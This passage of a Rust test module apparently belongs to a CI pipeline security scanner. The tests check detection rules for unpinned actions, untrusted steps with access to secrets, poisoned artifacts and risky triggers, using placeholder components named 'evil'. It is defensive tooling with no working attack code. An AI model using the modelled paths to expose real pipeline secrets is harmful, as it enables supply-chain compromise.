6748            git_ref: None,
6749            commit_sha: None,
6750        }
6751    }
6752
6753    #[test]
6754    fn unpinned_third_party_action_flagged() {
6755        let mut g = AuthorityGraph::new(source("ci.yml"));
6756        g.add_node(
6757            NodeKind::Image,
6758            "actions/checkout@v4",
6759            TrustZone::ThirdParty,
6760        );
6761
6762        let findings = unpinned_action(&g);
6763        assert_eq!(findings.len(), 1);
6764        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
6765    }
6766
6767    #[test]
6768    fn pinned_action_not_flagged() {
6769        let mut g = AuthorityGraph::new(source("ci.yml"));
6770        g.add_node(
6771            NodeKind::Image,
6772            "actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
6773            TrustZone::ThirdParty,
6774        );
6775
6776        let findings = unpinned_action(&g);
6777        assert!(findings.is_empty());
6778    }
6779
6780    #[test]
6781    fn untrusted_step_with_secret_is_critical() {
6782        let mut g = AuthorityGraph::new(source("ci.yml"));
6783        let step = g.add_node(NodeKind::Step, "evil-action", TrustZone::Untrusted);
6784        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
6785        g.add_edge(step, secret, EdgeKind::HasAccessTo);
6786
6787        let findings = untrusted_with_authority(&g);
6788        assert_eq!(findings.len(), 1);
6789        assert_eq!(findings[0].severity, Severity::Critical);
6790    }
6791
6792    #[test]
6793    fn implicit_identity_downgrades_to_info() {
6794        let mut g = AuthorityGraph::new(source("ci.yml"));
6795        let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
6796        let mut meta = std::collections::HashMap::new();
6797        meta.insert(META_IMPLICIT.into(), "true".into());
6798        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
6799        let token = g.add_node_with_metadata(
6800            NodeKind::Identity,
6801            "System.AccessToken",
6802            TrustZone::FirstParty,
6803            meta,
6804        );
6805        g.add_edge(step, token, EdgeKind::HasAccessTo);
6806
6807        let findings = untrusted_with_authority(&g);
6808        assert_eq!(findings.len(), 1);
6809        assert_eq!(
6810            findings[0].severity,
6811            Severity::Info,
6812            "implicit token must be Info not Critical"
6813        );
6814        assert!(findings[0].message.contains("platform-injected"));
6815    }
6816
6817    #[test]
6818    fn explicit_secret_remains_critical_despite_implicit_token() {
6819        let mut g = AuthorityGraph::new(source("ci.yml"));
6820        let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
6821        // implicit token → Info
6822        let mut meta = std::collections::HashMap::new();
6823        meta.insert(META_IMPLICIT.into(), "true".into());
6824        let token = g.add_node_with_metadata(
6825            NodeKind::Identity,
6826            "System.AccessToken",
6827            TrustZone::FirstParty,
6828            meta,
6829        );
6830        // explicit secret → Critical
6831        let secret = g.add_node(NodeKind::Secret, "ARM_CLIENT_SECRET", TrustZone::FirstParty);
6832        g.add_edge(step, token, EdgeKind::HasAccessTo);
6833        g.add_edge(step, secret, EdgeKind::HasAccessTo);
6834
6835        let findings = untrusted_with_authority(&g);
6836        assert_eq!(findings.len(), 2);
6837        let info = findings
6838            .iter()
6839            .find(|f| f.severity == Severity::Info)
6840            .unwrap();
6841        let crit = findings
6842            .iter()
6843            .find(|f| f.severity == Severity::Critical)
6844            .unwrap();
6845        assert!(info.message.contains("platform-injected"));
6846        assert!(crit.message.contains("ARM_CLIENT_SECRET"));
6847    }
6848
6849    #[test]
6850    fn artifact_crossing_untrusted_producer_firstparty_consumer_fires() {
6851        // Untrusted producer -> first-party consumer: should fire (poisoned artifact attack)
6852        let mut g = AuthorityGraph::new(source("ci.yml"));
6853        let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::Untrusted);
6854        let build = g.add_node(NodeKind::Step, "pr-build", TrustZone::Untrusted);
6855        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6856        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
6857
6858        g.add_edge(build, secret, EdgeKind::HasAccessTo);
6859        g.add_edge(build, artifact, EdgeKind::Produces);
6860        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6861
6862        let findings = artifact_boundary_crossing(&g);
6863        assert_eq!(findings.len(), 1);
6864        assert_eq!(
6865            findings[0].category,
6866            FindingCategory::ArtifactBoundaryCrossing
6867        );
6868    }
6869
6870    #[test]
6871    fn artifact_crossing_no_authority_still_fires() {
6872        // The crossing itself is the risk; no HasAccessTo edge required to fire.
6873        let mut g = AuthorityGraph::new(source("ci.yml"));
6874        let build = g.add_node(NodeKind::Step, "pr-build", TrustZone::Untrusted);
6875        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6876        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
6877        // No HasAccessTo edge on the producer — previously this caused the rule to skip.
6878        g.add_edge(build, artifact, EdgeKind::Produces);
6879        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6880        let findings = artifact_boundary_crossing(&g);
6881        assert_eq!(
6882            findings.len(),
6883            1,
6884            "boundary crossing must fire without a producer HasAccessTo edge; got: {findings:#?}"
6885        );
6886        assert_eq!(
6887            findings[0].category,
6888            FindingCategory::ArtifactBoundaryCrossing
6889        );
6890    }
6891
6892    // ── Bug regression: run_all_rules dedup ─────────────────────────────────
6893
6894    #[test]
6895    fn run_all_rules_deduplicates_structurally_identical_findings() {
6896        // Regression for Bug 3: BFS can visit the same (step, secret) pair via
6897        // two distinct graph paths. Both visits produce a finding with identical
6898        // category + nodes_involved + message. run_all_rules must emit exactly
6899        // one copy regardless of path count.
6900        let mut g = AuthorityGraph::new(source("ci.yml"));
6901        g.metadata
6902            .insert(META_PLATFORM.into(), "azure-devops".into());
6903        let secret = g.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
6904        let intermediate = g.add_node(NodeKind::Step, "middle-step", TrustZone::FirstParty);
6905        let sink = g.add_node(NodeKind::Step, "sink-step", TrustZone::Untrusted);
6906
6907        // Two paths from secret → sink: direct and via intermediate.
6908        g.add_edge(sink, secret, EdgeKind::HasAccessTo);
6909        g.add_edge(intermediate, secret, EdgeKind::HasAccessTo);
6910        g.add_edge(sink, intermediate, EdgeKind::HasAccessTo);
6911
6912        let findings = run_all_rules(&g, 4);
6913
6914        // Count findings whose nodes_involved contain the sink step.
6915        let sink_findings: Vec<_> = findings
6916            .iter()
6917            .filter(|f| f.nodes_involved.contains(&sink))
6918            .filter(|f| f.nodes_involved.contains(&secret))
6919            .collect();
6920
6921        // Regardless of path count through the graph, each unique
6922        // (category, nodes, message) triple must appear at most once.
6923        let unique_messages: std::collections::HashSet<_> =
6924            sink_findings.iter().map(|f| &f.message).collect();
6925        assert_eq!(
6926            sink_findings.len(),
6927            unique_messages.len(),
6928            "duplicate findings must be deduplicated; got: {findings:#?}"
6929        );
6930    }
6931
6932    #[test]
6933    fn artifact_crossing_same_job_does_not_fire() {
6934        // Upload and download in the same job is a legitimate temp-file pattern.
6935        // META_JOB_NAME guard must suppress the finding.
6936        let mut g = AuthorityGraph::new(source("ci.yml"));
6937        let build = g.add_node_with_metadata(
6938            NodeKind::Step,
6939            "pr-build",
6940            TrustZone::Untrusted,
6941            [(META_JOB_NAME.to_string(), "build".to_string())].into(),
6942        );
6943        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6944        let deploy = g.add_node_with_metadata(
6945            NodeKind::Step,
6946            "deploy",
6947            TrustZone::FirstParty,
6948            [
6949                (META_JOB_NAME.to_string(), "build".to_string()), // SAME job
6950            ]
6951            .into(),
6952        );
6953        g.add_edge(build, artifact, EdgeKind::Produces);
6954        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6955        let findings = artifact_boundary_crossing(&g);
6956        assert_eq!(
6957            findings.len(),
6958            0,
6959            "intra-job upload→download must not fire; got: {findings:#?}"
6960        );
6961    }
6962
6963    #[test]
6964    fn artifact_crossing_firstparty_producer_untrusted_consumer_silent() {
6965        // First-party producer -> untrusted consumer: should NOT fire (benign direction)
6966        let mut g = AuthorityGraph::new(source("ci.yml"));
6967        let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::FirstParty);
6968        let build = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
6969        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::FirstParty);
6970        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
6971
6972        g.add_edge(build, secret, EdgeKind::HasAccessTo);
6973        g.add_edge(build, artifact, EdgeKind::Produces);
6974        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6975
6976        let findings = artifact_boundary_crossing(&g);
6977        assert_eq!(
6978            findings.len(),
6979            0,
6980            "first-party -> untrusted should not fire"
6981        );
6982    }
6983
6984    #[test]
6985    fn propagation_to_sha_pinned_is_high_not_critical() {
6986        let mut g = AuthorityGraph::new(source("ci.yml"));
6987        let mut meta = std::collections::HashMap::new();
6988        meta.insert(
6989            "digest".into(),
6990            "a5ac7e51b41094c92402da3b24376905380afc29".into(),
6991        );
6992        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
6993        let step = g.add_node(NodeKind::Step, "checkout", TrustZone::ThirdParty);
6994        let image = g.add_node_with_metadata(
6995            NodeKind::Image,
6996            "actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
6997            TrustZone::ThirdParty,
6998            meta,
6999        );
7000
7001        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7002        g.add_edge(step, image, EdgeKind::UsesImage);
7003
7004        let findings = authority_propagation(&g, 4);
7005        // Should find propagation to the SHA-pinned image
7006        let image_findings: Vec<_> = findings
7007            .iter()
7008            .filter(|f| f.nodes_involved.contains(&image))
7009            .collect();
7010        assert!(!image_findings.is_empty());
7011        // SHA-pinned targets get High, not Critical (non-OIDC source)
7012        assert_eq!(image_findings[0].severity, Severity::High);
7013    }
7014
7015    #[test]
7016    fn oidc_identity_to_pinned_third_party_is_critical() {
7017        let mut g = AuthorityGraph::new(source("ci.yml"));
7018
7019        // OIDC-federated cloud identity — token itself is the threat
7020        let mut id_meta = std::collections::HashMap::new();
7021        id_meta.insert(META_OIDC.into(), "true".into());
7022        let identity = g.add_node_with_metadata(
7023            NodeKind::Identity,
7024            "AWS_OIDC_ROLE",
7025            TrustZone::FirstParty,
7026            id_meta,
7027        );
7028
7029        // SHA-pinned ThirdParty image — would normally be High without OIDC
7030        let mut img_meta = std::collections::HashMap::new();
7031        img_meta.insert(
7032            META_DIGEST.into(),
7033            "a5ac7e51b41094c92402da3b24376905380afc29".into(),
7034        );
7035        let image = g.add_node_with_metadata(
7036            NodeKind::Image,
7037            "aws-actions/configure-aws-credentials@a5ac7e51b41094c92402da3b24376905380afc29",
7038            TrustZone::ThirdParty,
7039            img_meta,
7040        );
7041
7042        // Step in ThirdParty zone holds the OIDC identity and uses the pinned image
7043        let step = g.add_node(
7044            NodeKind::Step,
7045            "configure-aws-credentials",
7046            TrustZone::ThirdParty,
7047        );
7048        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7049        g.add_edge(step, image, EdgeKind::UsesImage);
7050
7051        let findings = authority_propagation(&g, 4);
7052        let image_findings: Vec<_> = findings
7053            .iter()
7054            .filter(|f| f.nodes_involved.contains(&image))
7055            .collect();
7056        assert!(
7057            !image_findings.is_empty(),
7058            "expected OIDC→pinned propagation finding"
7059        );
7060        // OIDC source escalates pinned ThirdParty from High → Critical
7061        assert_eq!(image_findings[0].severity, Severity::Critical);
7062    }
7063
7064    #[test]
7065    fn propagation_to_untrusted_is_critical() {
7066        let mut g = AuthorityGraph::new(source("ci.yml"));
7067        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7068        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7069        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7070
7071        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7072        g.add_edge(step, image, EdgeKind::UsesImage);
7073
7074        let findings = authority_propagation(&g, 4);
7075        let image_findings: Vec<_> = findings
7076            .iter()
7077            .filter(|f| f.nodes_involved.contains(&image))
7078            .collect();
7079        assert!(!image_findings.is_empty());
7080        assert_eq!(image_findings[0].severity, Severity::Critical);
7081    }
7082
7083    #[test]
7084    fn long_lived_credential_detected() {
7085        let mut g = AuthorityGraph::new(source("ci.yml"));
7086        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
7087        g.add_node(NodeKind::Secret, "NPM_TOKEN", TrustZone::FirstParty);
7088        g.add_node(NodeKind::Secret, "DEPLOY_API_KEY", TrustZone::FirstParty);
7089        // Non-matching names
7090        g.add_node(NodeKind::Secret, "CACHE_TTL", TrustZone::FirstParty);
7091
7092        let findings = long_lived_credential(&g);
7093        assert_eq!(findings.len(), 2); // AWS_ACCESS_KEY_ID + DEPLOY_API_KEY
7094        assert!(findings
7095            .iter()
7096            .all(|f| f.category == FindingCategory::LongLivedCredential));
7097    }
7098
7099    #[test]
7100    fn duplicate_unpinned_actions_deduplicated() {
7101        let mut g = AuthorityGraph::new(source("ci.yml"));
7102        // Same action used in two jobs — two Image nodes, same name
7103        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7104        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7105        g.add_node(
7106            NodeKind::Image,
7107            "actions/setup-node@v3",
7108            TrustZone::Untrusted,
7109        );
7110
7111        let findings = unpinned_action(&g);
7112        // Should get 2 findings (checkout + setup-node), not 3
7113        assert_eq!(findings.len(), 2);
7114    }
7115
7116    #[test]
7117    fn broad_identity_scope_flagged_as_high() {
7118        let mut g = AuthorityGraph::new(source("ci.yml"));
7119        let mut meta = std::collections::HashMap::new();
7120        meta.insert(META_PERMISSIONS.into(), "write-all".into());
7121        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7122        let identity = g.add_node_with_metadata(
7123            NodeKind::Identity,
7124            "GITHUB_TOKEN",
7125            TrustZone::FirstParty,
7126            meta,
7127        );
7128        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7129        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7130
7131        let findings = over_privileged_identity(&g);
7132        assert_eq!(findings.len(), 1);
7133        assert_eq!(findings[0].severity, Severity::High);
7134        assert!(findings[0].message.contains("broad"));
7135    }
7136
7137    #[test]
7138    fn unknown_identity_scope_flagged_as_medium() {
7139        let mut g = AuthorityGraph::new(source("ci.yml"));
7140        let mut meta = std::collections::HashMap::new();
7141        meta.insert(META_PERMISSIONS.into(), "custom-scope".into());
7142        meta.insert(META_IDENTITY_SCOPE.into(), "unknown".into());
7143        let identity = g.add_node_with_metadata(
7144            NodeKind::Identity,
7145            "GITHUB_TOKEN",
7146            TrustZone::FirstParty,
7147            meta,
7148        );
7149        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7150        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7151
7152        let findings = over_privileged_identity(&g);
7153        assert_eq!(findings.len(), 1);
7154        assert_eq!(findings[0].severity, Severity::Medium);
7155        assert!(findings[0].message.contains("unknown"));
7156    }
7157
7158    #[test]
7159    fn floating_image_unpinned_container_flagged() {
7160        let mut g = AuthorityGraph::new(source("ci.yml"));
7161        let mut meta = std::collections::HashMap::new();
7162        meta.insert(META_CONTAINER.into(), "true".into());
7163        g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
7164
7165        let findings = floating_image(&g);
7166        assert_eq!(findings.len(), 1);
7167        assert_eq!(findings[0].category, FindingCategory::FloatingImage);
7168        assert_eq!(findings[0].severity, Severity::Medium);
7169    }
7170
7171    #[test]
7172    fn partial_graph_preserves_critical_findings() {
7173        let mut g = AuthorityGraph::new(source("ci.yml"));
7174        g.mark_partial("matrix strategy hides some authority paths");
7175
7176        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7177        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7178        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7179
7180        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7181        g.add_edge(step, image, EdgeKind::UsesImage);
7182
7183        let findings = run_all_rules(&g, 4);
7184        assert!(findings
7185            .iter()
7186            .any(|f| f.category == FindingCategory::AuthorityPropagation));
7187        assert!(findings
7188            .iter()
7189            .any(|f| f.category == FindingCategory::UntrustedWithAuthority));
7190        assert!(
7191            findings.iter().any(|f| f.severity == Severity::Critical),
7192            "partial graph completeness must not down-rank critical findings"
7193        );
7194    }
7195
7196    #[test]
7197    fn unknown_graph_preserves_critical_findings() {
7198        let mut g = AuthorityGraph::new(source("ci.yml"));
7199        g.completeness = crate::graph::AuthorityCompleteness::Unknown;
7200
7201        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7202        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7203        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7204
7205        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7206        g.add_edge(step, image, EdgeKind::UsesImage);
7207
7208        let findings = run_all_rules(&g, 4);
7209        assert!(
7210            findings.iter().any(|f| f.severity == Severity::Critical),
7211            "unknown graph completeness must not down-rank critical findings"
7212        );
7213    }
7214
7215    #[test]
7216    fn complete_graph_keeps_critical_findings() {
7217        let mut g = AuthorityGraph::new(source("ci.yml"));
7218
7219        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7220        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7221        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7222
7223        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7224        g.add_edge(step, image, EdgeKind::UsesImage);
7225
7226        let findings = run_all_rules(&g, 4);
7227        assert!(findings.iter().any(|f| f.severity == Severity::Critical));
7228    }
7229
7230    #[test]
7231    fn floating_image_digest_pinned_container_not_flagged() {
7232        let mut g = AuthorityGraph::new(source("ci.yml"));
7233        let mut meta = std::collections::HashMap::new();
7234        meta.insert(META_CONTAINER.into(), "true".into());
7235        g.add_node_with_metadata(
7236            NodeKind::Image,
7237            "ubuntu@sha256:a5ac7e51b41094c92402da3b24376905380afc29a5ac7e51b41094c92402da3b",
7238            TrustZone::ThirdParty,
7239            meta,
7240        );
7241
7242        let findings = floating_image(&g);
7243        assert!(
7244            findings.is_empty(),
7245            "digest-pinned container should not be flagged"
7246        );
7247    }
7248
7249    #[test]
7250    fn unpinned_action_does_not_flag_container_images() {
7251        // Regression: container Image nodes are handled by floating_image, not unpinned_action.
7252        // The same node must not generate findings from both rules.
7253        let mut g = AuthorityGraph::new(source("ci.yml"));
7254        let mut meta = std::collections::HashMap::new();
7255        meta.insert(META_CONTAINER.into(), "true".into());
7256        g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
7257
7258        let findings = unpinned_action(&g);
7259        assert!(
7260            findings.is_empty(),
7261            "unpinned_action must skip container images to avoid double-flagging"
7262        );
7263    }
7264
7265    #[test]
7266    fn floating_image_ignores_action_images() {
7267        let mut g = AuthorityGraph::new(source("ci.yml"));
7268        // Image node without META_CONTAINER — this is a step uses: action, not a container
7269        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7270
7271        let findings = floating_image(&g);
7272        assert!(
7273            findings.is_empty(),
7274            "floating_image should not flag step actions"
7275        );
7276    }
7277
7278    #[test]
7279    fn persisted_credential_rule_fires_on_persists_to_edge() {
7280        let mut g = AuthorityGraph::new(source("ci.yml"));
7281        let token = g.add_node(
7282            NodeKind::Identity,
7283            "System.AccessToken",
7284            TrustZone::FirstParty,
7285        );
7286        let checkout = g.add_node(NodeKind::Step, "checkout", TrustZone::FirstParty);
7287        g.add_edge(checkout, token, EdgeKind::PersistsTo);
7288
7289        let findings = persisted_credential(&g);
7290        assert_eq!(findings.len(), 1);
7291        assert_eq!(findings[0].category, FindingCategory::PersistedCredential);
7292        assert_eq!(findings[0].severity, Severity::High);
7293        assert!(findings[0].message.contains("persistCredentials"));
7294    }
7295
7296    #[test]
7297    fn untrusted_with_cli_flag_exposed_secret_notes_log_exposure() {
7298        let mut g = AuthorityGraph::new(source("ci.yml"));
7299        let step = g.add_node(NodeKind::Step, "TerraformCLI@0", TrustZone::Untrusted);
7300        let mut meta = std::collections::HashMap::new();
7301        meta.insert(META_CLI_FLAG_EXPOSED.into(), "true".into());
7302        let secret =
7303            g.add_node_with_metadata(NodeKind::Secret, "db_password", TrustZone::FirstParty, meta);
7304        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7305
7306        let findings = untrusted_with_authority(&g);
7307        assert_eq!(findings.len(), 1);
7308        assert!(
7309            findings[0].message.contains("-var flag"),
7310            "message should note -var flag log exposure"
7311        );
7312        assert!(matches!(
7313            findings[0].recommendation,
7314            Recommendation::Manual { .. }
7315        ));
7316    }
7317
7318    #[test]
7319    fn constrained_identity_scope_not_flagged() {
7320        let mut g = AuthorityGraph::new(source("ci.yml"));
7321        let mut meta = std::collections::HashMap::new();
7322        meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
7323        meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
7324        let identity = g.add_node_with_metadata(
7325            NodeKind::Identity,
7326            "GITHUB_TOKEN",
7327            TrustZone::FirstParty,
7328            meta,
7329        );
7330        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7331        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7332
7333        let findings = over_privileged_identity(&g);
7334        assert!(
7335            findings.is_empty(),
7336            "constrained scope should not be flagged"
7337        );
7338    }
7339
7340    #[test]
7341    fn trigger_context_mismatch_fires_on_pull_request_target_with_secret() {
7342        let mut g = AuthorityGraph::new(source("ci.yml"));
7343        g.metadata
7344            .insert(META_TRIGGER.into(), "pull_request_target".into());
7345        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7346        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7347        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7348
7349        let findings = trigger_context_mismatch(&g);
7350        assert_eq!(findings.len(), 1);
7351        assert_eq!(findings[0].severity, Severity::Critical);
7352        assert_eq!(
7353            findings[0].category,
7354            FindingCategory::TriggerContextMismatch
7355        );
7356    }
7357
7358    #[test]
7359    fn trigger_context_mismatch_no_fire_without_trigger_metadata() {
7360        let mut g = AuthorityGraph::new(source("ci.yml"));
7361        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7362        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7363        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7364
7365        let findings = trigger_context_mismatch(&g);
7366        assert!(findings.is_empty(), "no trigger metadata → no finding");
7367    }
7368
7369    #[test]
7370    fn cross_workflow_authority_chain_detected() {
7371        let mut g = AuthorityGraph::new(source("ci.yml"));
7372        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7373        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7374        let external = g.add_node(
7375            NodeKind::Image,
7376            "evil/workflow.yml@main",
7377            TrustZone::Untrusted,
7378        );
7379        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7380        g.add_edge(step, external, EdgeKind::DelegatesTo);
7381
7382        let findings = cross_workflow_authority_chain(&g);
7383        assert_eq!(findings.len(), 1);
7384        assert_eq!(findings[0].severity, Severity::Critical);
7385        assert_eq!(
7386            findings[0].category,
7387            FindingCategory::CrossWorkflowAuthorityChain
7388        );
7389    }
7390
7391    #[test]
7392    fn cross_workflow_authority_chain_no_fire_if_local_delegation() {
7393        let mut g = AuthorityGraph::new(source("ci.yml"));
7394        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7395        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7396        let local = g.add_node(NodeKind::Image, "./local-action", TrustZone::FirstParty);
7397        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7398        g.add_edge(step, local, EdgeKind::DelegatesTo);
7399
7400        let findings = cross_workflow_authority_chain(&g);
7401        assert!(
7402            findings.is_empty(),
7403            "FirstParty delegation should not be flagged"
7404        );
7405    }
7406
7407    #[test]
7408    fn authority_cycle_detected() {
7409        let mut g = AuthorityGraph::new(source("ci.yml"));
7410        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7411        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7412        g.add_edge(a, b, EdgeKind::DelegatesTo);
7413        g.add_edge(b, a, EdgeKind::DelegatesTo);
7414
7415        let findings = authority_cycle(&g);
7416        assert_eq!(findings.len(), 1);
7417        assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
7418        assert_eq!(findings[0].severity, Severity::High);
7419    }
7420
7421    #[test]
7422    fn authority_cycle_no_fire_for_acyclic_graph() {
7423        let mut g = AuthorityGraph::new(source("ci.yml"));
7424        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7425        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7426        let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
7427        g.add_edge(a, b, EdgeKind::DelegatesTo);
7428        g.add_edge(b, c, EdgeKind::DelegatesTo);
7429
7430        let findings = authority_cycle(&g);
7431        assert!(findings.is_empty(), "acyclic graph must not fire");
7432    }
7433
7434    #[test]
7435    fn uplift_without_attestation_fires_when_oidc_no_attests() {
7436        let mut g = AuthorityGraph::new(source("ci.yml"));
7437        let mut meta = std::collections::HashMap::new();
7438        meta.insert(META_OIDC.into(), "true".into());
7439        let identity = g.add_node_with_metadata(
7440            NodeKind::Identity,
7441            "AWS/deploy-role",
7442            TrustZone::FirstParty,
7443            meta,
7444        );
7445        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7446        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7447
7448        let findings = uplift_without_attestation(&g);
7449        assert_eq!(findings.len(), 1);
7450        assert_eq!(findings[0].severity, Severity::Info);
7451        assert_eq!(
7452            findings[0].category,
7453            FindingCategory::UpliftWithoutAttestation
7454        );
7455    }
7456
7457    #[test]
7458    fn uplift_without_attestation_no_fire_when_attests_present() {
7459        let mut g = AuthorityGraph::new(source("ci.yml"));
7460        let mut id_meta = std::collections::HashMap::new();
7461        id_meta.insert(META_OIDC.into(), "true".into());
7462        let identity = g.add_node_with_metadata(
7463            NodeKind::Identity,
7464            "AWS/deploy-role",
7465            TrustZone::FirstParty,
7466            id_meta,
7467        );
7468        let mut step_meta = std::collections::HashMap::new();
7469        step_meta.insert(META_ATTESTS.into(), "true".into());
7470        let attest_step =
7471            g.add_node_with_metadata(NodeKind::Step, "attest", TrustZone::FirstParty, step_meta);
7472        let build_step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7473        g.add_edge(build_step, identity, EdgeKind::HasAccessTo);
7474        // Touch attest_step so the variable is used (avoid unused warning)
7475        let _ = attest_step;
7476
7477        let findings = uplift_without_attestation(&g);
7478        assert!(findings.is_empty(), "attestation present → no finding");
7479    }
7480
7481    #[test]
7482    fn uplift_without_attestation_no_fire_without_oidc() {
7483        let mut g = AuthorityGraph::new(source("ci.yml"));
7484        let mut meta = std::collections::HashMap::new();
7485        meta.insert(META_PERMISSIONS.into(), "write-all".into());
7486        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7487        // Note: no META_OIDC
7488        let identity = g.add_node_with_metadata(
7489            NodeKind::Identity,
7490            "GITHUB_TOKEN",
7491            TrustZone::FirstParty,
7492            meta,
7493        );
7494        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7495        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7496
7497        let findings = uplift_without_attestation(&g);
7498        assert!(
7499            findings.is_empty(),
7500            "broad identity without OIDC must not fire"
7501        );
7502    }
7503
7504    #[test]
7505    fn self_mutating_pipeline_untrusted_is_critical() {
7506        let mut g = AuthorityGraph::new(source("ci.yml"));
7507        let mut meta = std::collections::HashMap::new();
7508        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7509        g.add_node_with_metadata(NodeKind::Step, "fork-step", TrustZone::Untrusted, meta);
7510
7511        let findings = self_mutating_pipeline(&g);
7512        assert_eq!(findings.len(), 1);
7513        assert_eq!(findings[0].severity, Severity::Critical);
7514        assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
7515    }
7516
7517    #[test]
7518    fn self_mutating_pipeline_privileged_step_is_high() {
7519        let mut g = AuthorityGraph::new(source("ci.yml"));
7520        let mut meta = std::collections::HashMap::new();
7521        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7522        let step = g.add_node_with_metadata(NodeKind::Step, "build", TrustZone::FirstParty, meta);
7523        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7524        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7525
7526        let findings = self_mutating_pipeline(&g);
7527        assert_eq!(findings.len(), 1);
7528        assert_eq!(findings[0].severity, Severity::High);
7529    }
7530
7531    #[test]
7532    fn trigger_context_mismatch_fires_on_ado_pr_with_secret_as_high() {
7533        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7534        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7535        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
